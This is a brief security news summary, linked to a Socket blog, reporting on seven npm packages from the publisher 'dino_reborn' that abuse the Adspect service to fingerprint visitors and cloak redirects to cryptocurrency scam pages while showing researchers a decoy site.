https://socket.dev/blog/npm-malware-campaign-uses-adspect-cloaking-to-deliver-malicious-redirects
Researchers have uncovered a concerning trend of malicious NPM packages that are abusing the Adspect cloud-based service to bypass security measures and lead unsuspecting victims to cryptocurrency scam sites.
The investigation by security firm Socket has identified seven packages published under the developer name ‘dino_reborn’, six of which contain malicious code designed to collect visitor data and determine whether the traffic is from a researcher or a potential victim.
The attack works by gathering various details about the user’s browser environment, such as user agent, referrer, URI, and language, and sending this “fingerprinting” data to the Adspect API. Adspect then evaluates the information and classifies the visitor, redirecting potential victims to a fake cryptocurrency-branded CAPTCHA page that triggers a deceptive sequence leading to the scam site.
Meanwhile, visitors flagged as potential researchers are shown a benign Offlido company page to reduce suspicion. This sophisticated cloaking mechanism, which also includes anti-analysis techniques like blocking right-click and developer tools, makes it significantly more challenging for security researchers to investigate and mitigate the threat.
While Adspect has stated that it does not target researchers directly and that the abuse of its service is a violation of its terms of use, the incident highlights the need for increased vigilance and collaboration within the cybersecurity community to address the ongoing battle against malicious actors exploiting legitimate services to evade detection and compromise unsuspecting users.